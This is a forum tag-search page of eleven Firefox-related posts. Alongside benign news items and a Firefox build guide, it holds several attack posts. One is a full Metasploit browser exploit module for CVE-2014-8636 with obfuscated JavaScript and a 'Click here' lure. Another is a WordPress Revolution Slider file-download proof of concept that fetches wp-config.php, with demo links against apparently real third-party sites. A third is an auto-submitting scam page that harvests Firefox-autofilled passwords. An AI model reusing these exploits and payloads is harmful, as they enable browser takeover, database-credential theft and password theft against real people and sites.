Showing results for tags 'firefox'.



Found 11 results

  1. Maybe it will be useful to you. https://www.sendspace.com/file/h4rxna SOURCE: HackHound
  2. Hi, either some changes were made or... I'm trying from home, from work, and also from a VPS in the Netherlands to connect to RST with Mozilla Firefox, and it gives me this crap: I figure there's no way I'm the only one this happens to, I mean 3 different IPs, 3 different PCs, and it only happens to me on Mozilla Firefox; right now I'm logged in from IE (don't curse at me). I cleared cookies and cache, history, restarted... no use...
  3. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/exploitation/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection', 'Description' => %q{ This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'joev' # discovery and metasploit module ], 'DisclosureDate' => "Jan 20 2014", 'References' => [ ['CVE', '2014-8636'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ] ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(31, 34) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ]) ], self.class) end def on_request_exploit(cli, request, target_info) send_response_html(cli, generate_html(target_info)) end def default_html "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected." 
end def generate_html(target_info) key = Rex::Text.rand_text_alpha(5 + rand(12)) frame = Rex::Text.rand_text_alpha(5 + rand(12)) r = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin js = js_obfuscate %Q| var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; var props = {}; props.has = function(n){ if (!window.top.x && n=='nodeType') { window.top.x=window.open("chrome://browser/content/browser.xul", "x", "chrome,,top=-9999px,left=-9999px,height=100px,width=100px"); if (window.top.x) { Object.setPrototypeOf(document, pro); setTimeout(function(){ x.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>'; setTimeout(function(){ x.messageManager.loadFrameScript('data:,'+key, false); setTimeout(function(){ x.close(); }, 100) }, 100) }, 100); } } } var pro = Object.getPrototypeOf(document); Object.setPrototypeOf(document, Proxy.create(props)); | %Q| <!doctype html> <html> <body> <script> #{js} </script> #{datastore['CONTENT'] || default_html} </body> </html> | end end Source
  4. It's been a long time coming, but now the users of Firefox and Opera browsers don’t need to rely on the Chrome browser to access WhatsApp Web client, as the most popular smartphone messaging service has announced that the Web-based version of its service now works on Firefox and Opera web browsers too.

      WHATSAPP WEB AVAILABLE FOR OPERA & FIREFOX

      Almost a month ago, WhatsApp launched the web client of its service but the access was limited only to the Google Chrome users. Now, the company is giving more choices to desktop users by launching WhatsApp Web today for Opera and Firefox browsers, though you’ll still have to wait a little longer if you’re a Safari user. WhatsApp Web is nothing more than an extension of the core mobile WhatsApp application. It syncs conversations from your smartphone devices to your PCs, with everything stored on the mobile device itself.

      HOW TO USE WHATSAPP ON PC/DESKTOP

      In order to install WhatsApp Web on your PC or laptop running Google Chrome, Mozilla Firefox or Opera browsers, you need to follow the same steps, as the sign-up process is the same as with Chrome browser: Interested WhatsApp users simply need to open Chrome and navigate to WhatsApp Web. A QR code will appear on the web page, which must be scanned using WhatsApp mobile application to activate the service. By scanning the QR code that appears, users will automatically have paired their mobile WhatsApp with the WhatsApp web client, as shown. For now, WhatsApp Web only works with Android, Windows Phone and BlackBerry devices, but unfortunately, iPhones still don't have the capability to scan the WhatsApp Web QR code because there's no web solution at this time for iOS users because of limitations of the platform. Currently, WhatsApp has 700 million users sending 30 billion messages per day, and is bigger than most of its competitors, including Facebook Messenger, Line and WeChat. Now, this new WhatsApp web client available for a wider range of browsers will definitely increase its market. Source
  5. Mozilla has patched 16 security vulnerabilities in Firefox, including three critical flaws in the browser. One of the critical vulnerabilities patched with the release of Firefox 36 is a buffer overflow in the libstagefright library that can be exploitable under some circumstances. “Security researcher Pantrombka reported a buffer overflow in the libstagefright library during video playback when certain invalid MP4 video files led to the allocation of a buffer that was too small for the content. This led to a potentially exploitable crash,” the Mozilla advisory says. Among the other critical bugs patched in this release is a use-after-free vulnerability in the IndexedDB component of the browser. “Security researcher Paul Bandha used the Address Sanitizer tool to discover a use-after-free vulnerability when running specific web content with IndexedDB to create an index. This leads to a potentially exploitable crash,” Mozilla said in its advisory. Firefox 36 also includes patches for a variety of memory safety vulnerabilities. The new release also includes fixes for a number of high-risk vulnerabilities, one of which affects the Mozilla updater function in the browser. The bug could let an attacker load malicious files. “Security researcher Holger Fuhrmannek reported that when the Mozilla updater is run directly, the updater will load binary DLL format files from the local working directory or from the Windows temporary directories. This occurs when it is run without the Mozilla Maintenance Service on Windows systems. This allowed for possibly malicious DLL files to execute with elevated privileges if a user agrees when a User Account Control (UAC) prompt from Windows is displayed,” the advisory says. The new browser also includes fixes for a handful of other medium and low-risk security bugs. Source
  6. Open source SWF player promises alternative to Adobe's endless security horror In November 2012 the Mozilla Foundation announced “Project Shumway”, an effort to create a “web-native runtime implementation of the SWF file format.” Two-and-a-bit years, and a colossal number of Flash bugs later, Shumway has achieved an important milestone by appearing in a Firefox nightly, a step that suggests it's getting closer to inclusion in the browser. Shumway's been available as a plugin for some time, and appears entirely capable of handling the SWF files. Few average users know of Shumway's existence, never mind seek it out. So the inclusion of the software in Firefox's nightlies will give it greater exposure. For now the code can only play certain videos hosted on Amazon.com, but developers intend to expand the list of sites from which Shumway will play SWF files. For now, Shumway-in-Firefox-nightlies works only on Windows Vista or later versions of Windows, and OSX. But expanded support is promised. When it arrives in a full version of Firefox, it will mean that about 15.1 per cent of all web surfing won't need Flash (based on W3counter market share data). Flash is a security nightmare that we recently suggested deserves to rot in an unmarked grave. Mozilla looks to be giving it a welcome shove in just that direction. Source
  7. [+] Title: Wordpress slider reolusion local file download [+] Date: 2015-01-25 [+] Author: JOK3R [+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/ [+] Tested on: windows 7 / firefox , kali linux / firefox [+] Vulnerable Files: /plugins/revolution-slider/ [+} Dork : "Index of" /wp-content/plugins/revolution-slider/ ### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Demo: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Credits: [+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS* And All iranian Hacker's And Exploiter's <3 [+] iran-cyber.in Source
  8. Hackbar: Execute commands like SQL Injection, XSS and more… link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/
      Live HTTP Headers: Capture all <META> (HEADERS) of a page (used when uploading a shell….) link: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
      SQL Inject Me: SQL Injection commands and automations link: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/
      Firebug: Edit a website’s source code link: https://addons.mozilla.org/en-US/firefox/addon/firebug/
      Tamper Data: Watch the data that your computer sends to a website and the data the website sends to you. Can also hack Flash games gifts like Wild Ones. link: https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
      Do I also need to translate into Romanian what each add-on does?
  9. The latest release of the Firefox web browser, version 26, now blocks Java software on all websites by default unless the user specifically authorizes the Java plugin to run. The change has been a long time coming. The Mozilla Foundation had originally planned to make click-to-run the default for all versions of the Java plugin beginning with Firefox 24, but decided to delay the change after dismayed users raised a stink. Beginning with the version of Firefox that shipped on Tuesday, whenever the browser encounters a Java applet or a Java Web Start launcher, it first displays a dialog box asking for authorization before allowing the plugin to launch. Users can also opt to click "Allow and Remember," which adds the current webpage to an internal whitelist so that Java code on it will run automatically in the future, without further human intervention. Mozilla's move comes after a series of exploits made the Java plugin one of the most popular vectors for web-based malware attacks over the past few years. So many zero-day exploits targeting the plugin have been discovered, in fact, that the Firefox devs have opted to give all versions of Java the cold shoulder, including the most recent one. Generally speaking, Mozilla plans to activate click-to-run for all plugins by default, although the Adobe Flash Player plugin has been given a pass so far, owing to the prevalence of Flash content on the web. In addition to the change to the default Java plugin behavior, Firefox 26 includes a number of security patches, bug fixes, and minor new features. The official release notes are available here and a full list of changes in the release can be found here. As usual, current Firefox installations can be upgraded to version 26 using the internal update mechanism, and installers for the latest release are available from the Firefox homepage. Source: http://www.theregister.co.uk/2013/12/10/firefox_26_blocks_java/
  10. Introduction to Firefox Firefox is a stand-alone browser based on the Mozilla codebase. This package is known to build and work properly using an LFS-7.2 platform. Package Information Download (FTP): ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/16.0.1/source/firefox-16.0.1.source.tar.bz2 Download MD5 sum: 78e641c67dc4a40cb3f48fce3e782d41 Download size: 85 MB Estimated disk space required: 994 MB (34 MB installed) (or 647 MB and 4.1 MB if using xulrunner) Estimated build time: 27 SBU (0.4 SBU if using xulrunner) Firefox Dependencies Required alsa-lib-1.0.26 GTK+-2.24.13 Zip-3.0 UnZip-6.0 Recommended yasm-1.2.0 libvpx-v1.1.0 (to allow Firefox to play webm videos). Optional D-Bus Bindings startup-notification-0.12 SQLite-3.7.14.1 Hunspell: open source spell checking, stemming, morphological analysis and generation under GPL, LGPL or MPL licenses libevent-2.0.20 Doxygen-1.8.2 gnome-vfs-2.24.4 libgnomeui-2.24.5 (for integration with the old version of Gnome) libnotify-0.7.5 NSPR-4.9.2 NSS-3.13.6 Wireless Tools-29 Valgrind Home (only for testing the jemalloc code) Wget-1.14 Xulrunner-16.0.1 User Notes: firefox – BLFS Trac Installation of Firefox There are two major methods for building Firefox. In the standard case, the entire suite of libraries is built and installed. In the other, most of the system is built using the procedures found in Xulrunner-16.0.1. This is advantageous if you are planning to build other related packages such as IcedTea-Web-1.3. With either build method, you need to run the main build procedure below with the appropriate options in the mozconfig file. Then use the appropriate install instructions depending on the chosen build method. The configuration of Firefox is accomplished by creating a mozconfig file containing the desired configuration options. A default mozconfig is created below. To see the entire list of available configuration options (and an abbreviated description of each one), issue ./configure --help. 
You may also wish to review the entire file and uncomment any other desired options. The commented line for --with-libxul-sdk has an escaped dollar sign - if you have chosen to paste the entries into a mozconfig file in your editor, you do not need the escape, it is only necessary when invoking a subshell in a HERE document. Create the file by issuing the following command: cat > mozconfig << EOF # If you have a multicore machine you can speed up the build by running # several jobs at once, but if you have a single core, delete this line: mk_add_options MOZ_MAKE_FLAGS="-j4" # If you have not installed Yasm, uncomment this option: # ac_add_options --disable-webm # If you have installed DBus-Glib delete this option: ac_add_options --disable-dbus # If you have installed wireless-tools delete this option: ac_add_options --disable-necko-wifi # If you have installed libnotify delete this option: ac_add_options --disable-libnotify # If you have installed xulrunner uncomment these two lines: # ac_add_options --with-system-libxul # ac_add_options --with-libxul-sdk=\$(pkg-config --variable=sdkdir libxul) # Note: The backslash above is to facilitate a paste operation. It # should not appear in the mozconfig file. 
# Uncomment these if you have installed them: # ac_add_options --enable-startup-notification # ac_add_options --enable-system-hunspell # ac_add_options --enable-system-sqlite # ac_add_options --with-system-libevent # ac_add_options --with-system-libvpx # ac_add_options --with-system-nspr # ac_add_options --with-system-nss mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/firefox-build-dir ac_add_options --enable-official-branding ac_add_options --prefix=/usr # The rest of these options have no effect if you're # building against an already installed xulrunner: ac_add_options --disable-crashreporter ac_add_options --disable-debug ac_add_options --disable-installer ac_add_options --disable-static ac_add_options --disable-tests ac_add_options --disable-updater ac_add_options --enable-shared ac_add_options --enable-system-cairo ac_add_options --enable-system-ffi ac_add_options --with-pthreads ac_add_options --with-system-jpeg ac_add_options --with-system-png ac_add_options --with-system-zlib EOF If you are building a stand-alone firefox with system versions of nspr, nss, or sqlite issue the following command: sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' \ browser/installer/Makefile.in && Compile Firefox by issuing the following commands: sed -i 's# ""##' browser/base/Makefile.in && make -f client.mk This package does not come with a test suite. 
If you have not linked Firefox against an installed Xulrunner: make -C firefox-build-dir/browser/installer Now, as the root user, if you have not linked Firefox against an installed Xulrunner, install the package: rm -rf /usr/lib/firefox-16.0.1 && mkdir /usr/lib/firefox-16.0.1 && tar -xvf firefox-build-dir/dist/firefox-16.0.1.en-US.linux-$(uname -m).tar.bz2 \ -C /usr/lib/firefox-16.0.1 --strip-components=1 && ln -sfv ../lib/firefox-16.0.1/firefox /usr/bin && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 && chown -R -v root:root /usr/lib/firefox-16.0.1 If you have linked against an already installed Xulrunner, as the root user: make -C firefox-build-dir install && rm /usr/bin/firefox && cat > /usr/bin/firefox << "HERE_DOC" && #!/bin/bash /usr/lib/xulrunner-16.0.1/xulrunner /usr/lib/firefox-16.0.1/application.ini "${@}" HERE_DOC chmod 755 /usr/bin/firefox && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 NPAPI Headers The above instructions just install the parts you need to run Firefox. If you want to compile gnash-0.8.10, the open source version of Flash, copy some headers that Gnash needs into /usr/include, as the root user: rm -rf /usr/include/npapi && mkdir -v /usr/include/npapi && cp -v dom/plugins/base/*.h /usr/include/npapi Command Explanations sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' ...: This sed fixes an error in the internal packaging check.. sed -i 's# ""##' browser/base/Makefile.in: This sed removes an unprintable control character from the title bar. make -f client.mk ...: Mozilla products are packaged to allow the use of a configuration file which can be used to pass the configuration settings to the configure command. make uses the client.mk file to get initial configuration and setup parameters. make -C firefox-build-dir/browser/installer: this creates a Firefox tarball similar to the ones you can download from Mozilla. 
tar -xvf firefox-build-dir/dist ...: This untars Firefox in /usr/lib. The --strip-components=1 option removes the leading 'firefox' directory from the filenames, allowing us to untar it into a versioned directory. make -C firefox-build-dir install: This runs make install in firefox-build-dir. ln -sfv ... /usr/bin/firefox: this puts a symbolic link to the firefox executable in your ${PATH}. mkdir -p /usr/lib/mozilla/plugins: this checks that /usr/lib/mozilla/plugins exists. ln -sv ... /usr/lib/firefox-16.0.1: this makes a symbolic link to /usr/lib/mozilla/plugins. It's not really needed, Firefox checks /usr/lib/mozilla/plugins by default, we make the symbolic link to keep all the plugins installed in one folder. Configuring Firefox If you deleted the --disable-webm option from your mozconfig, your Firefox can play most YouTube videos without the need for the flash plugin. To enable this, go to YouTube and click on 'Join the HTML5 Trial' (needs cookies enabled). If you use a desktop environment like Gnome or KDE you may like to create a firefox.desktop file so that Firefox appears in the panel's menus. If you didn't enable startup-notification in your mozconfig change the StartupNotify line to false. As the root user: mkdir -pv /usr/share/applications && cat > /usr/share/applications/firefox.desktop << "EOF" && [Desktop Entry] Encoding=UTF-8 Type=Application Name=Firefox Comment=Browse The Web Icon=firefox Exec=firefox Categories=Network;GTK;Application;Browser;WebBrowser; StartupNotify=true Terminal=false EOF ln -sfv /usr/lib/firefox-16.0.1/icons/mozicon128.png /usr/share/pixmaps/firefox.png Contents Installed Programs: firefox Installed Libraries: Numerous libraries, browser components, plugins, extensions, and helper modules installed in /usr/lib/firefox-16.0.1. Installed Directories: /usr/include/npapi and /usr/lib/firefox-16.0.1. Source: Firefox-16.0.1
  11. Fire, the Browser and the Mind are useful to you as long as you know how to master them

      Most users are so lazy that they would rather hope they will never be the target of a cyber attack than look for and use the information needed to protect their confidential data, which in most cases becomes truly important only after some "uninvited guest" gains access to it. But as we well know, if something bad can happen, it will happen, and wishing with all our might that it does not happen will not help us at all. That is why, in this article, I want to talk a little about the security and the convenience of using the «Password Manager», which in my opinion do not make a very good team together.

      Of course, it is very convenient when the browser automatically fills in all the fields, including the username and password. But as you can imagine, this data is saved on the hard disk, and once someone gains access to the PC, they also gain access to this data, which is encrypted and, to some extent, cannot be extracted as easily as some would like. In principle, every company tries to protect the login data saved by the browser as well as it can, but in my opinion the ones who do it best are the people at the Mozilla Foundation, who develop the well-known Mozilla Firefox browser. That is, even if the attacker gains access to the files in which the browser's passwords are saved, the technology used by Firefox will make sure the attacker cannot extract the encrypted data (too easily).

      Based on such "ideas", it would be more logical and safer to save passwords with the «Password Manager», because even if the PC is infected with a Trojan (one that cannot extract the encrypted data, of course), the passwords remain safe as long as the user does not manually type the password on a scam page or have it captured by a sniffer. However, this latter method, fortunately, will not work for all sites, for a few reasons (such as challenge-response authentication or secure connections). As for scam pages, this technique is indeed quite dangerous and will certainly affect most "ordinary" users. But usually, unlike the vast majority, even if an expert types the password on a scam page, on seeing that the password is not accepted or that the browser is behaving "strangely", they will immediately realize what is going on and will know they have only minutes to log in to the account as quickly as possible and change the password, and then find and remove the problem.

      Now, let us imagine a user who has an account on an important site, has the Firefox browser installed, and has the passwords for this site saved with the «Password Manager», but who, on top of all that, also has a small "program" running without their knowledge and waiting for commands from its "master". Fortunately, our hero (the user, of course) knows very well what information security is, and as you can well imagine, the attacker cannot steal the saved passwords with the help of a scam page (I forgot to mention that the small "program" is so small that it could neither extract the encrypted data nor did it have a sniffer). However, despite the fact that the user is a true professional, a scam page can still be used to steal the passwords saved with the Firefox «Password Manager», only without the user "witnessing" this tragic scene.

      The problem is that once the Firefox browser opens a site for which login data has been saved, it automatically fills in the fields with the required data, and all that is left for the attacker is to simulate the user's click. Most interestingly, for Firefox this can also be done at the web programming level:

      <html> <head> <title>Welcome to Scam page</title> </head> <body onload='document.forms[0].send.click();'> <form method='post'> <input type='text' name='user' /> <input type='password' name='pass' /> <input type='submit' name='send' id='send' value='login' /> </form> </body> </html>

      Thus, if the passwords were saved with the «Password Manager», then on opening the page above the «user» and «pass» fields will be filled in automatically by Firefox and the data will be sent to the server, without the user clicking or typing anything.

      In principle, that was the idea. Of course, there are many more questions, for example about the other browsers, about those many users who believe "I am an expert and will easily spot the scam", and many other questions, the answers to which you will find very quickly if you step outside the "little box".